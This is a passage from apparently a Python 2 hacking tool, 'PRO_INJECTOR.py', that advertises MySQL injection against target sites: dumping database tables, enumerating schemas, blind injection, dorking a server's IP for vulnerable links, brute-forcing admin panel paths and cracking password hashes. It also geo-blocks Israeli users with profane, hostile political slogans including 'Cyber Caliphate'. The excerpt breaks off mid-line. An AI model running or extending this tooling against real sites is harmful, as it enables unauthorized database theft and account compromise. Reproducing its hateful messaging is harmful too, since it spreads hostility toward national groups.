3864.     print "\nThe Following Hashes Were cracked:\n----------------------------------\n" ; file.write('\n-----------------------------------------------------')
3865.     print crackedhashes and "\n".join ("%s >>>> %s" % (hashvalue, result.strip()) for hashvalue, result in crackedhashes) or "NO HASH WAS CRACKED." ; file.write(crackedhashes and "\n".join ("%s ==> %s" % (hashvalue, result.strip()) for hashvalue, result in crackedhashes) or "NO HASH WAS CRACKED.")
3866.     print
3867.    
3868.     return cracked
3869.  
3870.  
3871.  
3872.  
3873. def searchHash (hashvalue):
3874.    
3875.    
3876.     start = 0
3877.     finished = False
3878.     results = []
3879.    
3880.     sys.stdout.write("\nThe hash wasn't found in any database. Maybe Google has any idea...\nLooking for results...")
3881.     sys.stdout.flush()
3882.    
3883.     while not finished:
3884.        
3885.         sys.stdout.write('.')
3886.         sys.stdout.flush()
3887.    
3888.        
3889.         url = "http://www.google.com/search?hl=en&q=%s&filter=0" % (hashvalue)
3890.         if start:
3891.             url += "&start=%d" % (start)
3892.            
3893.        
3894.         headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
3895.        
3896.         response = do_HTTP_request ( url, httpheaders=headers )
3897.        
3898.         html = None
3899.         if response:
3900.             html = response.read()
3901.         else:
3902.             continue
3903.            
3904.         resultlist = findall (r'<a href="[^"]*?" class=l', html)
3905.        
3906.         new = False
3907.         for r in resultlist:
3908.             url_r = r.split('"')[1]
3909.            
3910.             if not url_r in results:
3911.                 results.append (url_r)
3912.                 new = True
3913.        
3914.         start += len(resultlist)
3915.        
3916.         if not new:
3917.             finished = True
3918.        
3919.    
3920.     if results:
3921.         print "\n\nGoogle has some results. Maybe you would like to check them manually:\n"
3922.        
3923.         results.sort()
3924.         for r in results:
3925.             print "  *> %s" % (r)
3926.         print
3927.    
3928.     else:
3929.         print "\n\nGoogle doesn't have any result. Sorry!\n"
3930.  
3931.  
3932. for arg in sys.argv:
3933.    
3934.  
3935.    if arg == "-ip" :
3936.         ip = sys.argv[count+1]
3937.    elif arg == "-dork" :
3938.         Dork = sys.argv[count+1]
3939.    elif arg == "-hash" :
3940.         hash = sys.argv[count+1]
3941.    elif arg == "--a":
3942.         mode = arg
3943.    elif arg == "--v":
3944.         mode = arg
3945.    elif arg == "--p":
3946.         mode = arg
3947.    elif arg == "--l":
3948.         mode = arg
3949.    elif arg == "--adm":
3950.         mode = arg
3951.    elif arg == "-h" :
3952.         mode = arg;algorithm = sys.argv[1].lower()
3953.    elif arg == "-u" or arg == "--url":
3954.         site = sys.argv[count+1]
3955.    elif arg == "--output":
3956.         logfile = sys.argv[count+1]
3957.    elif arg == "--php":
3958.         mode = arg  
3959.    elif arg == "--asp":
3960.         mode = arg
3961.    elif arg == "--cfm":
3962.         mode = arg
3963.    elif arg == "--cgi":
3964.         mode = arg
3965.    elif arg == "--brf":
3966.         mode = arg
3967.    elif arg == "--proxy":
3968.         proxy = sys.argv[count+1]
3969.    elif arg == "--proxyauth":
3970.         arg_proxy_auth = sys.argv[count+1]
3971.    elif arg == "--dump":
3972.         mode = arg;arg_dump = sys.argv[count]
3973.    elif arg == "--full":
3974.         mode = arg
3975.    elif arg == "--schema":
3976.         mode = arg;arg_schema = sys.argv[count]
3977.    elif arg == "--dbs":
3978.         mode = arg;arg_dbs = sys.argv[count]
3979.    elif arg == "--fuzz":
3980.         mode = arg;arg_fuzz = sys.argv[count]
3981.    elif arg == "--info":
3982.         mode = arg;arg_info = sys.argv[count]
3983.    elif arg == "--crack":
3984.         mode = arg;arg_hash = sys.argv[count+1]
3985.    elif arg == "--wordlist":
3986.         arg_wordlist = sys.argv[count+1]
3987.    elif arg == "--findcol":
3988.         mode = arg;arg_findcol = sys.argv[count]
3989.    elif arg == "--cookie":
3990.         arg_cookie = sys.argv[count+1]
3991.    elif arg == "--ssl":
3992.         arg_ssl = "on"
3993.    elif arg == "-b" or arg == "--blind":
3994.         arg_blind = arg;arg_blind = sys.argv[count]
3995.    elif arg == "-s" or arg == "--string":
3996.         arg_string = sys.argv[count+1]
3997.    elif arg == "-D":
3998.         arg_database = sys.argv[count+1]
3999.    elif arg == "-T":
4000.         arg_table = sys.argv[count+1]
4001.    elif arg == "-C":
4002.         arg_columns = sys.argv[count+1]
4003.    elif arg == "--start":
4004.         num = int(sys.argv[count+1]) - 1
4005.         table_num = num
4006.    elif arg == "-d" or arg == "--debug":
4007.         arg_debug = "on"
4008.    elif arg == "--where":
4009.         arg_where = sys.argv[count+1]
4010.    elif arg == "--orderby":
4011.         arg_orderby = sys.argv[count+1]
4012.    elif arg == "--rowdisp":
4013.         arg_rowdisp = sys.argv[count]
4014.         arg_rowdisp = 0
4015.    elif arg == "--end":
4016.         arg_end = sys.argv[count+1]
4017.         if arg_end == "--":
4018.             arg_eva = "+"
4019.         else:
4020.             arg_eva = "/**/"
4021.    count+=1
4022.    
4023. if len(sys.argv) <= 1:
4024.    print'''                                                      
4025.  
4026.                          #
4027.                           ##            
4028.                            ###
4029.                          #  ####        
4030.                           #  #####          
4031.                           ##  ######
4032.                           ###  ######
4033.                          ####   ######
4034.                         ###### ########
4035.                       ##            ####
4036.                  #  ##                ###  #
4037.                 #  ##    ###########    ##  #
4038.                ## ##    ##########      ##  ##
4039.                ## ##    #  #########    ##  ##
4040.                ## ## #      #########   ##  ##
4041.                ##### ##      #########  ##  ##
4042.                 #######  #    ############ ##
4043.                  ######  ##    ########## ##
4044.                   #### ####     ####### ##
4045.                     ######       #### ##
4046.                       #### ## ##  ####
4047.                          ## ## ## ##
4048.                                                                
4049.                  
4050.            
4051.    {+} AnXieTy & Vandal Example Work. Need team! (V 1.0){+} '''
4052.    print '================================================================================'
4053.    print '[*] This Tool Is Coded By AXT & Vandal !                                       ||'
4054.    print '[*] GreetZ To All  !                                                           ||'
4055.    print '[*] You can Scan All Sites of Any Server with Your Dork  !                     ||'
4056.    print '[*] You can Find Admin Panel !                                                 ||'
4057.    print '[*] You can Crack Hashes OnLine !                                              ||'
4058.    print '[*] You can Inject With SQLi !                                                 ||'
4059.    print '[*] You can Know Type Of Any Hash !                                            ||'
4060.    print '[+] IF YOU SEE ANY ERROR !! CONTACT US FOR HELP !!!!!!!!                       ||'
4061.    print '================================================================================'
4062.    print '                      >>>> --help TO GET HELP  <<<<                            '
4063.    sys.exit(1)
4064.  
4065. print '\t[!]   Testing Your internet settings  [!] '
4066.  
4067.  
4068.  
4069. try :
4070.    IL = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
4071.    BLOCK = 'http://whatismyipaddress.com/ip/'+IL
4072.    SITE = urllib2.urlopen(BLOCK)
4073.    HTML = SITE.read()
4074.    PAT = re.compile ('<img [^>]*src="([^"]+)')
4075.    LIEN = PAT.findall(HTML)
4076.    if 'http://cdn.whatismyipaddress.com/images/flags/il.png' in  LIEN :
4077.  
4078.      print "\n\t\t IN THE NAME OF ALLAH "
4079.      print "\n\t\t FREE GAZA"
4080.      print "\n\t\t FREE PALASTINE "
4081.      print "\n\t\t FUCK ISRAEL "
4082.      print "\n\t\t FUCK USA "
4083.      print "\n\t\t Cyber Caliphate "
4084.      sys.exit(1)
4085.    else :
4086.      print ' \t\t\t=================== '
4087.      print ' \t\t\tPraise Coders  '
4088.      print ' \t\t\t===================\n\n '
4089.  
4090.  
4091.    
4092. except urllib2.URLError:
4093.     if mode == '--p' or mode == '--l' :
4094.            print ' \t\t\tThis OPTION is Work  Offline !!'
4095.            print '\t\t\t But Check Your internet settings For Lasts OPTIONS '
4096.     elif arg == "--help":
4097.             print ' \t\t\tCheck Your internet settings . Use All OPTIONS ' ;     print '\n \t You   Can Use Just ID_HASH Offline '
4098.             print '--------------- ' ; print 'ID_HASH OPTIONS ' ; print '--------------- '; print '      -hash HASH           HASH IF WANT KNOW IT ID'; print '      --p                  FOR GET ALL POSSIBLE HASHES'; print '      --l                  FOR GET LEAST POSSIBLE HASHES'
4099.             sys.exit(1)
4100.     else :
4101.            print '  Session Cancelled  !!  Check   Your internet settings '
4102.            sys.exit(1)
4103.    
4104.    
4105.  
4106. for arg in sys.argv:
4107.         if arg == "--help":
4108.            
4109.            
4110.          
4111.            print ' -------------------------'
4112.            print '  IP_SQLi_FINDER OPTIONS : '
4113.            print ' -------------------------'
4114.            print '      -u URL, --url=URL    TARGET URL'
4115.            print '      -ip                  TARGET IP'
4116.            print '      -dork                ANY DORK SQLi YOU LIKE USE IT EX = ( id= )'
4117.            print '      --a                  FOR GET ALL LINKS FINDING BY YOUR DORK IN TARGET IP '
4118.            print '      --v                  FOR GET ALL LINKS VULN IN TARGET IP '
4119.            print ' ------------'
4120.            print ' SQLi OPTIONS:'
4121.            print ' ------------'
4122.            print '      -d, --debug          DISPLAY URL DEBUG INFORMATIO'
4123.            print '      -u URL, --url=URL    TARGET URL'
4124.            print '      -b, --blind          USE BLIND METHODOLOGY (req: --string)'
4125.            print '      -s, --string         STRING TO MATCH IN PAGE WHEN THE QUERY IS VALID'
4126.            print '      --crack=HASH         CRACK MySQL HASHES (req: --wordlist)'
4127.            print '      --wordlist=LIS.TXT   WORDLIST TO BE USED FOR CRACKING'
4128.            print '      --dump               DUMP DATABASE TABLE ENTRIES  (req: -T)'
4129.            print '      --schema             ENUMERATE INFORMATION_SCHEMA(req: -D)'
4130.            print '      --rowdisp            DO NOT DISPLAY ROW # WHEN DUMPING'
4131.            print '      --cookie=FILE.TXT    USEA MOZILLA COOKIE FILE'
4132.            print '      --proxy=PROXY        USE A HTTP PROXY TO CONNECT TO THE TARGET URL'
4133.            print '      --orderby=COL        USEA ORDER BY CLAUSE IN  YOUR DUMP'
4134.            print '      --output=FILE.TXT    OUTPUT RESULTS OF TOOL TO THIS FILE'
4135.            print '      --where=COL,VALUE    USE A WHERE CLAUSE IN YOUR DUMP'
4136.            print '      --start=ROW          ROW NEMBER TO BEGIN DUMPING AT'
4137.            print '      --method=PUT         SELECT TO USE PUT METHOD ** NOT WORKING'
4138.            print '      --dbs                ENUMERATE DATABASES           MySQL v5+'
4139.            print '                           OPT: -T)                      MySQL v5+'
4140.            print '      --full               ENUMERATE ALL THE TOOL  CAN   MySQL v5+'
4141.            print '      --info               MySQL SERVER CONFIGURATION    MySQL v4+'
4142.            print '      --fuzz               FUEE TABLES & COLUMNS NAMES   MySQL v4+'
4143.            print '      --findcol            FIND COLUMN LENGTH            MySQL v4+'
4144.            print '                      OPT: -D, -C, --start)         MySQL v4+'
4145.            print '      -D DB                DATABASE TO ENUMERATE'
4146.            print '      -T TBL               DATABASE TABLE TO ENUMERATE'
4147.            print '      -C COL               DATABASE TABLE COLUMN TO ENUMERATE'
4148.            print '      --ssl                TO USE SSL'
4149.            print '      --end                TO USE   +  AND -- FOR THE URLS --end \--\ (Default)'
4150.            print '                           TO USE /**/ AND /* FOR THE URLS --end \/*\ '
4151.            print ' ----------------'
4152.            print ' TYPE_HASH OPTIONS:'
4153.            print ' ----------------'
4154.            print '      -hash HASH           HASH IF WANT KNOW IT TYPE'
4155.            print '      --p                  FOR GET ALL POSSIBLE HASHES '
4156.            print '      --l                  FOR GET LEAST POSSIBLE HASHES'
4157.            print ' ---------------------'
4158.            print ' HACH_CRACKER OPTIONS:'
4159.            print ' ---------------------'
4160.            print '      -h HASH              IF YOU WANT TO CRACK ONE HASH'
4161.            print '      -f FILE.txt          IF YOU HAVE SEREVAL HASHEES'
4162.            print '    ALGORITHIMS : '
4163.            print '''  
4164.                              MD4       - RFC 1320
4165.                             MD5       - RFC 1321
4166.                             SHA1      - RFC 3174 (FIPS 180-3)
4167.                             SHA224    - RFC 3874 (FIPS 180-3)
4168.                             SHA256    - FIPS 180-3
4169.                             SHA384    - FIPS 180-3
4170.                             SHA512    - FIPS 180-3
4171.                             RMD160    - RFC 2857
4172.                             GOST      - RFC 5831
4173.                             WHIRLPOOL - ISO/IEC 10118-3:2004
4174.                             LM        - Microsoft Windows hash
4175.                             NTLM      - Microsoft Windows hash
4176.                             MYSQL     - MySQL 3, 4, 5 hash
4177.                             CISCO7    - Cisco IOS type 7 encrypted passwords
4178.                             JUNIPER   - Juniper Networks $9$ encrypted passwords
4179.                             LDAP_MD5  - MD5 Base64 encoded
4180.                             LDAP_SHA1 - SHA1 Base64 encoded '''
4181.            print '    EXAMPE :'
4182.            print '      ./PRO_INJECTOR.py MD5 -h 098f6bcd4621d373cade4e832627b4f6 '
4183.            print '      ./PRO_INJECTOR.py GOST -f GOST.txt'
4184.            print ' --------------------------'
4185.            print ' ADMIN_PANEL_FINDER OPTIONS:'
4186.            print ' --------------------------'
4187.            print '      -u URL, --url=URL     TARGET URL'
4188.            print '      --php                 FIND ADMIN PANEL PHP'
4189.            print '      --asp                 FIND ADMIN PANEL ASP'
4190.            print '      --cfm                 FIND ADMIN PANEL CFM'
4191.            print '      --cgi                 FIND ADMIN PANEL CGI '
4192.            print '      --brf                 FIND ADMIN PANEL BRF'
4193.            print '   #########################################################################'
4194.            print '   ## All  Results is Written In '+logfile+' Dnt Forget Check it ^_^ ##'
4195.            print '   #########################################################################'
4196.            sys.exit(1)
4197.  
4198. if mode == '--v' or mode == '--a' :
4199.      if ip =="" :
4200.         site = site.replace('http://','') ;site = site.replace('https://','') ; site = site.replace('/','')  ;  ip = socket.gethostbyname( site )
4201.  
4202. Dork = Dork.replace(' ','+')
4203. Dork = Dork.replace("?",'%3F')
4204. Dork = Dork.replace("=",'%3D')
4205. Dork = Dork.replace(":",'%3A')
4206. Dork = Dork.replace("/",'%2F')
4207. Dork = Dork.replace("'",'%27')
4208. Dork = Dork.replace("(",'%28')
4209. Dork = Dork.replace(")",'%29')
4210. Rebel = 'http://www.bing.com/search?q=ip%3a'
4211. Ghost = '&go=Valider%2cValider&qs=ds%2cds&first='
4212. Meca1  = Rebel+ip+'+'+Dork+Ghost+'1' ; Meca2 = Rebel+ip+'+'+Dork+Ghost+'11'; Meca3 = Rebel+ip+'+'+Dork+Ghost+'21' ; Meca4 = Rebel+ip+'+'+Dork+Ghost+'31'; Meca5 = Rebel+ip+'+'+Dork+Ghost+'41'
4213. Meca6  = Rebel+ip+'+'+Dork+Ghost+'51' ; Meca7 = Rebel+ip+'+'+Dork+Ghost+'61' ; Meca8 = Rebel+ip+'+'+Dork+Ghost+'71'  ; Meca9 = Rebel+ip+'+'+Dork+Ghost+'81' ; Meca10 = Rebel+ip+'+'+Dork+Ghost+'91'
4214. Meca11 = Rebel+ip+'+'+Dork+Ghost+'101' ; Meca12 = Rebel+ip+'+'+Dork+Ghost+'111'; Meca13 = Rebel+ip+'+'+Dork+Ghost+'121' ; Meca14 = Rebel+ip+'+'+Dork+Ghost+'131'; Meca15 = Rebel+ip+'+'+Dork+Ghost+'141'
4215. Meca16 = Rebel+ip+'+'+Dork+Ghost+'151' ; Meca17 = Rebel+ip+'+'+Dork+Ghost+'161'; Meca18 = Rebel+ip+'+'+Dork+Ghost+'171' ; Meca19 = Rebel+ip+'+'+Dork+Ghost+'181'; Meca20 = Rebel+ip+'+'+Dork+Ghost+'191'
4216. Meca21 = Rebel+ip+'+'+Dork+Ghost+'201' ; Meca22 = Rebel+ip+'+'+Dork+Ghost+'211'; Meca23 = Rebel+ip+'+'+Dork+Ghost+'221' ; Meca24 = Rebel+ip+'+'+Dork+Ghost+'231'; Meca25 = Rebel+ip+'+'+Dork+Ghost+'241'
4217. Meca26 = Rebel+ip+'+'+Dork+Ghost+'251' ; Meca27 = Rebel+ip+'+'+Dork+Ghost+'261'; Meca28 = Rebel+ip+'+'+Dork+Ghost+'271' ; Meca29 = Rebel+ip+'+'+Dork+Ghost+'281'; Meca30 = Rebel+ip+'+'+Dork+Ghost+'291'
4218. Meca31 = Rebel+ip+'+'+Dork+Ghost+'301' ; Meca32 = Rebel+ip+'+'+Dork+Ghost+'311'; Meca33 = Rebel+ip+'+'+Dork+Ghost+'321' ; Meca34 = Rebel+ip+'+'+Dork+Ghost+'331'; Meca35 = Rebel+ip+'+'+Dork+Ghost+'341'
4219. Meca36 = Rebel+ip+'+'+Dork+Ghost+'351' ; Meca37 = Rebel+ip+'+'+Dork+Ghost+'361'; Meca38 = Rebel+ip+'+'+Dork+Ghost+'371' ; Meca39 = Rebel+ip+'+'+Dork+Ghost+'381'; Meca40 = Rebel+ip+'+'+Dork+Ghost+'391'
4220. Meca41 = Rebel+ip+'+'+Dork+Ghost+'401' ; Meca42 = Rebel+ip+'+'+Dork+Ghost+'411'; Meca43 = Rebel+ip+'+'+Dork+Ghost+'421' ; Meca44 = Rebel+ip+'+'+Dork+Ghost+'431'; Meca45 = Rebel+ip+'+'+Dork+Ghost+'441'
4221. Meca46 = Rebel+ip+'+'+Dork+Ghost+'451' ; Meca47 = Rebel+ip+'+'+Dork+Ghost+'461'; Meca48 = Rebel+ip+'+'+Dork+Ghost+'471' ; Meca49 = Rebel+ip+'+'+Dork+Ghost+'481'; Meca50 = Rebel+ip+'+'+Dork+Ghost+'491'
4222. Islam=[]
4223. Muslim=[]
4224. D1=0 ; D2=0 ; D3=0 ; D4=0 ; D5=0; D6=0 ; D7=0 ; D8=0 ; D9=0 ; D10=0
4225. D11=0 ; D12=0 ; D13=0 ; D14=0 ; D15=0; D16=0 ; D17=0 ; D18=0 ; D19=0 ; D20=0
4226. D21=0 ; D22=0 ; D23=0 ; D24=0 ; D25=0; D26=0 ; D27=0 ; D28=0 ; D29=0 ; D30=0
4227. D31=0 ; D32=0 ; D33=0 ; D34=0 ; D35=0; D36=0 ; D37=0 ; D38=0 ; D39=0 ; D40=0
4228. D41=0 ; D42=0 ; D43=0 ; D44=0 ; D45=0; D46=0 ; D47=0 ; D48=0 ; D49=0 ; D50=0
4229. x=0
4230. Y=[]
4231. b=0
4232. See = []
4233. def GREATEST(seq, idfun=None):
4234.    if idfun is None:
4235.     def idfun(x): return x
4236.     seen = {}
4237.    for item in seq:
4238.     marker = idfun(item)
4239.     if marker in seen: continue
4240.     seen[marker] = 1
4241.     Muslim.append(item)
4242. def RebelGhost(seq, idfun=None):
4243.    if idfun is None:
4244.     def idfun(x): return x
4245.     seen = {}
4246.    for item in seq:
4247.     marker = idfun(item)
4248.     if marker in seen: continue
4249.     seen[marker] = 1
4250.     See.append(item)
4251.  
4252. def ANACONDA(Num,Var):
4253.  Var[Num]=Var[Num].replace("http://www.microsofttranslator.com/","")
4254.  Var[Num]=Var[Num].replace("http://go.microsoft.com/","")
4255.  Var[Num]=Var[Num].replace("http://onlinehelp.microsoft.com","")
4256.  Var[Num]=Var[Num].replace("javascript:","")
4257.  
4258.  
4259.  if ':' in list(Var[Num])  :
4260.   Islam.append(Var[Num])
4261.  
4262. def Kh_Mar404(Hunter,a):
4263.  Bing = urllib2.urlopen(Hunter)
4264.  Html = Bing.read()
4265.  Pat= re.compile ('<a [^>]*href="([^"]+)')
4266.  Lien = Pat.findall(Html)
4267.  while a<len(Lien):
4268.   ANACONDA(a,Lien)
4269.   a=a+1
4270.  
4271. def Hajar() :
4272.  
4273.   Kh_Mar404(Meca1,D1); Kh_Mar404(Meca2,D2); Kh_Mar404(Meca3,D3); Kh_Mar404(Meca4,D4); Kh_Mar404(Meca5,D5)
4274.   Kh_Mar404(Meca6,D6); Kh_Mar404(Meca7,D7); Kh_Mar404(Meca8,D8); Kh_Mar404(Meca9,D9); Kh_Mar404(Meca10,D10)
4275.   Kh_Mar404(Meca11,D11) ; Kh_Mar404(Meca12,D12) ; Kh_Mar404(Meca13,D13) ; Kh_Mar404(Meca14,D14) ; Kh_Mar404(Meca15,D15)
4276.   Kh_Mar404(Meca16,D16) ; Kh_Mar404(Meca17,D17) ; Kh_Mar404(Meca18,D18) ; Kh_Mar404(Meca19,D19) ; Kh_Mar404(Meca20,D20)
4277.   Kh_Mar404(Meca21,D21) ; Kh_Mar404(Meca22,D22) ; Kh_Mar404(Meca23,D23) ; Kh_Mar404(Meca24,D24) ; Kh_Mar404(Meca25,D25)
4278.   Kh_Mar404(Meca26,D26) ; Kh_Mar404(Meca27,D27) ; Kh_Mar404(Meca28,D28) ; Kh_Mar404(Meca29,D29) ; Kh_Mar404(Meca30,D30)
4279.   Kh_Mar404(Meca31,D31) ; Kh_Mar404(Meca32,D32) ; Kh_Mar404(Meca33,D33) ; Kh_Mar404(Meca34,D34) ; Kh_Mar404(Meca35,D35)
4280.   Kh_Mar404(Meca36,D36) ; Kh_Mar404(Meca37,D37) ; Kh_Mar404(Meca38,D38) ; Kh_Mar404(Meca39,D39) ; Kh_Mar404(Meca40,D40)
4281.   Kh_Mar404(Meca41,D41) ; Kh_Mar404(Meca42,D42) ; Kh_Mar404(Meca43,D43) ; Kh_Mar404(Meca44,D44) ; Kh_Mar404(Meca45,D45)
4282.   Kh_Mar404(Meca46,D46) ; Kh_Mar404(Meca47,D47) ; Kh_Mar404(Meca48,D48) ; Kh_Mar404(Meca49,D49) ; Kh_Mar404(Meca50,D40)
4283.   GREATEST(Islam)
4284.  
4285.  
4286.  
4287. file = open(logfile, "a")
4288.  
4289. print '\t####################################################################'
4290. print '\t## ^_^ Coded By AnXieTy .. F.T.P ^_^ ##'  
4291. print '\t##  ------------------------------------------------------------  ##'
4292. print '\t## [!] PRO_INJECTOR.py [-] Profficional MySQL Injection Tool [!]  ##'
4293. print '\t##  ------------------------------------------------------------  ##'
4294. print '\t##  {!} MySQL_Injection_Tool [+] IP_SQli_Reserve [+] Id_Hash {!}  ## '
4295. print '\t##      {!} Hash_Cracker_Online [+] Admin_Panel_Finder {!}        ## '
4296. print '\t##  ------------------------------------------------------------  ##'
4297. print '\t##  In The Name OF Allah !! ^_^ !! Free Gaza ! Free Palestine     ## '
4298. print '\t####################################################################'
4299. print '\t######################  '+strftime("%Y-%m-%d %H:%M:%S", gmtime())+'  #######################'
4300. print '\t####################################################################'
4301. print '\n\n\n'
4302.                  
4303. file.write("\n\n\n\t####################################################################")
4304. file.write("\n\t## ^_^ Coded By AnXieTy .. F.T.P ^_^ ##")
4305. file.write("\n\t##  ------------------------------------------------------------  ##")
4306. file.write("\n\t## [!] PRO_INJECTOR.py [-] Profficional MySQL Injection Tool [!]  ##")
4307. file.write("\n\t##  ------------------------------------------------------------  ##")
4308. file.write("\n\t##  {!} MySQL_Injection_Tool [+] IP_SQli_Reserve [+] Id_Hash {!}  ##")
4309. file.write("\n\t##       {!} Hash_Cracker_Online [+] Admin_Panel_Finder {!}       ##")
4310. file.write("\n\t##  ------------------------------------------------------------  ##")
4311. file.write("\n\t##  In The Name OF Allah !! ^_^ !! Free Gaza ! Free Palestine     ##")
4312. file.write("\n\t####################################################################")
4313. file.write("\n\t######################  "+strftime("%Y-%m-%d %H:%M:%S", gmtime())+"  #######################")
4314. file.write("\n\t#################################################################### \n\n\n")
4315.  
4316. if mode == "--p":
4317.     ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()
4318.     if len(jerar)==0:
4319.      print "----------"
4320.      print "NOT FOUND" ;file.write( hash +'Not Found')
4321.  
4322.      print "----------"
4323.      sys.exit(1)
4324.    
4325.     elif len(jerar)>2:
4326.         jerar.sort()
4327.         print "----------------"
4328.         print "POSSIBLE HASHES:" ;file.write( "HASH IS : "+hash + " : \nPOSSIBLE HASHES:")
4329.  
4330.         print "----------------" ;file.write(' \n -------------------')
4331.         print "[+] ",algorithms[jerar[0]] ;file.write( "\n[+] "+algorithms[jerar[0]])
4332.         print "[+] ",algorithms[jerar[1]] ;file.write( "\n[+] "+algorithms[jerar[1]])
4333.         print "" ; sys.exit(1)
4334.        
4335.     else:
4336.         jerar.sort()
4337.         print "----------------"
4338.         print "POSSIBLE HASHES:" ;file.write( hash +" :\nPOSSIBLE HASHES:")
4339.        
4340.         print "----------------"
4341.         for a in range(len(jerar)):
4342.             print "[+] ",algorithms[jerar[a]] ;file.write( "\n [+] "+algorithms[jerar[a]])
4343.         sys.exit(1)    
4344. if mode == "--php" :
4345.         site = site.replace('https://','')
4346.         site = site.replace('http://','')
4347.         try:
4348.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4349.           conn = httplib.HTTPConnection(site)
4350.           conn.connect()
4351.           print "\t[!] YES ^_^ ... SERVER Is Online."
4352.         except (httplib.HTTPResponse, socket.error) as Exit:
4353.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4354.            sys.exit(1)
4355.            
4356.         print("\t [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4357.         for admin in php:
4358.             admin = admin.replace("\n","")
4359.             admin = "/" + admin
4360.             host = site + admin
4361.              
4362.            
4363.             print ("\t [+] Checking " + host + "...")
4364.             connection = httplib.HTTPConnection(site)
4365.             connection.request("GET",admin)
4366.             response = connection.getresponse()
4367.             var2 = var2 + 1
4368.             if response.status == 200:
4369.                 var1 = var1 + 1
4370.                 print ( "\n\n >>> " + host, " Admin Panel Found! ^_^ ") ; file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4371.                 raw_input("Press ENTER To Continue ....\n")
4372.             elif response.status == 404:
4373.                 var2 = var2
4374.             elif response.status == 302:
4375.                 print "\n >>> " + host, " Possible Admin Panel (302 - Redirect)" ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4376.             else:
4377.                 print (host, " Interesting Response:", response.status)
4378.             connection.close()
4379.         print("\n\n TH3  END \n")
4380.         print " Admin Panels found : " ,var1
4381.         print " Total Pages Scanned : " ,var2
4382.         sys.exit(1)    
4383. if mode == "--l":  
4384.     ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); 